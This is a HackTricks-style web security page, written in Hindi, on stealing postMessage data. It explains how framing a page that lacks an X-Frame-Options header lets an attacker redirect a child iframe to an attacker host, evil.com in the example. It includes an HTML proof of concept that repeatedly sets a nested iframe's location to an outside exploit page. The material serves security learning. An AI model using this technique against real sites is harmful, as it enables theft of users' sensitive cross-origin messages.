Hindi - Ht

Steal postmessage modifying iframe location

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!

बच्चा आईफ्रेम के स्थानों को बदलना

इस व्राइटअप के अनुसार, यदि आप एक वेबपेज को आईफ्रेम कर सकते हैं जिसमें X-Frame-Header नहीं है और जिसमें एक और आईफ्रेम है, तो आप उस बच्चा आईफ्रेम का स्थान बदल सकते हैं

उदाहरण के लिए, यदि abc.com के पास efg.com आईफ्रेम है और abc.com के पास X-Frame हेडर नहीं है, तो मैं efg.com को evil.com cross origin में बदल सकता हूं, frames.location का उपयोग करके।

यह विशेष रूप से पोस्टमैसेज में उपयुक्त है क्योंकि यदि कोई पेज वाइल्डकार्ड जैसे windowRef.postmessage("","*") का उपयोग करके संवेदनशील डेटा भेज रहा है, तो संबंधित आईफ्रेम (बच्चा या माता) का स्थान हमलावर कंट्रोल किए गए स्थान पर बदलना संभव है और उस डेटा को चुरा सकते हैं।

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
PreviousBypassing SOP with Iframes - 2NextProxy / WAF Protections Bypass

Last updated